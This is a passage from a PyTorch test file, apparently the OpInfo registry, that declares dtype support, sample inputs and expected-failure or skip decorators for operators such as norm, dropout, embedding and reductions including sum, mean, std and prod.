it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), # `torch.norm` has multiple code paths depending on the value of `p`. # These paths have different dtype support. Also JIT supports, # most variants but not all of them. So we split the OpInfo entries, # for `norm` based on the code-paths and JIT support. OpInfo( "norm", sample_inputs_func=sample_inputs_norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo('norm', variant_test_name='nuc', aten_name='nuclear_norm', sample_inputs_func=sample_inputs_norm_nuc, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], check_batched_gradgrad=False, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types(), skips=( # RuntimeError not raised : # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 ) ), OpInfo('norm', variant_test_name='fro', aten_name='frobenius_norm', sample_inputs_func=sample_inputs_norm_fro, dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 )), OpInfo( "norm", variant_test_name="inf", sample_inputs_func=sample_inputs_norm_inf, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), ), ), OpInfo('t', sample_inputs_func=sample_inputs_t, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), assert_autodiffed=True, error_inputs_func=error_inputs_t), UnaryUfuncInfo('special.erfcx', ref=scipy.special.erfcx if TEST_SCIPY else _NOTHING, aten_name='special_erfcx', decorators=(toleranceOverride({torch.float32: tol(atol=0, rtol=4e-6), }),), dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo( "nn.functional.dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Probably because we have used lambda for the op here # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # inplace variant dispatches to dropout kernel, while on CUDA # the op dispatches to _fused_dropout (with a few more conditions) # hence, different values and this skip here DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False, sample_inputs_func=sample_inputs_dropout, inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.dropout2d", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (3, 4) sample_inputs_func=partial(sample_inputs_dropout, valid_input_dim=(3, 4)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs, inplace=True)), # In training mode, feature_alpha_dropout currently doesn't support inputs of complex dtype # unlike when `train=False`, it supports complex inputs, hence 2 OpInfos to cover all cases OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="with_train", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (4, 5) sample_inputs_func=partial(sample_inputs_dropout, train=True, valid_input_dim=(4, 5)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="without_train", ref=_NOTHING, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=partial(sample_inputs_dropout, train=False), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.one_hot", ref=reference_one_hot, supports_out=False, dtypes=_dispatch_dtypes((torch.int64,)), sample_inputs_func=sample_inputs_one_hot, ), OpInfo( "nn.functional.embedding", aten_backward_name="embedding_dense_backward", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding(idx, weight, **kwargs), dtypes=floating_types_and(torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_embedding, error_inputs_func=error_inputs_embedding, supports_forward_ad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Reference: https://github.com/pytorch/pytorch/issues/67084 DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'), # Not a problem: embedding does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), supports_expanded_weight=True, supports_out=False, ), OpInfo( "nn.functional.embedding_bag", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding_bag(idx, weight, **kwargs), dtypes=floating_types_and(torch.float16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), # backward is not supported for mode `max` and dtype `bfloat16` backward_dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_embedding_bag, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Not a problem: embedding_bag does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', device_type='cpu'), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, supports_gradgrad=False, ), UnaryUfuncInfo( "nn.functional.softplus", aten_backward_name='softplus_backward', ref=reference_softplus, sample_kwargs=lambda device, dtype, input: ({'beta': 3, 'threshold': .2}, {'beta': 3, 'threshold': .2}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'beta': 3, 'threshold': .2}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), decorators=( DecorateInfo( toleranceOverride ({ torch.half: tol(atol=1e-2, rtol=1e-2), torch.bfloat16: tol(atol=1e-2, rtol=1e-2), }), 'TestUnaryUfuncs'), ), ), OpInfo( "linalg.tensorinv", ref=np.linalg.tensorinv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorinv, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagmaAndNoCusolver], ), OpInfo( "linalg.tensorsolve", ref=lambda a, b, dims=None: np.linalg.tensorsolve(a, b, axes=dims), dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorsolve, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagma], ), OpInfo( "nn.functional.mse_loss", aten_backward_name='mse_loss_backward', ref=loss_reference_reduction_wrapper(lambda input, target: (input - target) ** 2), sample_inputs_func=sample_inputs_loss, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.float16), backward_dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.grid_sample", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, sample_inputs_func=sample_inputs_grid_sample, supports_gradgrad=False, gradcheck_nondet_tol=1e-15), OpInfo( "argwhere", ref=np.argwhere, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, sample_inputs_func=sample_inputs_argwhere, ), ReductionOpInfo( 'all', identity=True, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.all), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'any', identity=False, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.any), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'amax', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amax), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'amin', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amin), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'argmax', supports_multiple_dims=False, supports_autograd=False, assert_jit_shape_analysis=True, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'argmin', supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'count_nonzero', identity=0, supports_out=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_reduction_count_nonzero, ref=reference_reduction_numpy(np.count_nonzero), skips=( # FIXME: count_nonzero does not accept keepdim kwarg DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_single_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_unsorted_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_offbounds_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), ), ), ReductionOpInfo( 'mean', nan_policy='propagate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, # FIXME: mean needs 'dim' parameter when using the 'out' overload. # Adding it with 'generate_args_kwargs' does not work, since these also get passed # onto the reference implementations. supports_out=False, assert_autodiffed=True, assert_jit_shape_analysis=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.mean), error_inputs_func=error_inputs_mean, skips=( # FIXME: mean does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: mean reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: mean does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'nanmean', nan_policy='omit', assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_nan_reduction(supports_multiple_dims=True), ref=reference_reduction_numpy(np.nanmean), skips=( # AssertionError: False is not true : # Failure in testing nodes' autodifferentiation. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', device_type='cuda', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'std', nan_policy='propagate', supports_out=False, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.std), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'var', nan_policy='propagate', supports_out=False, assert_autodiffed=True, promotes_int_to_float=True, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.var), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'prod', identity=1, nan_policy='propagate', supports_multiple_dims=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_prod, ref=reference_reduction_numpy(np.prod), skips=( # FIXME: prod does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: prod does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16, torch.complex64]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.uint8, torch.float16, torch.complex64]), ), ), ReductionOpInfo( 'sum', identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), ref=reference_reduction_numpy(np.sum), skips=( # FIXME: sum does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: sum does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.float16]), ), ), ReductionOpInfo( 'nansum', identity=0, nan_policy='omit', supports_out=True, promotes_int_to_int64=True, dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.nansum), skips=( # FIXME: nansum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: flaky test so skipped instead of xfailed # possibly bad low precision reference in numpy DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), ), ), ReductionOpInfo( '_masked.sum', ref=reference_reduction_numpy(np.sum), method_variant=None, identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestReductions', 'test_ref_small_input'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction ), ReductionOpInfo( '_masked.prod', ref=reference_reduction_numpy(np.prod), method_variant=None, identity=1, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, # FIXME: "prod_cpu" not implemented for 'BFloat16' # FIXME: "prod_cpu" not implemented for 'Half' dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32),), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_ref_duplicate_values'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction, ), OpInfo( '_masked.cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), OpInfo( '_masked.cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both 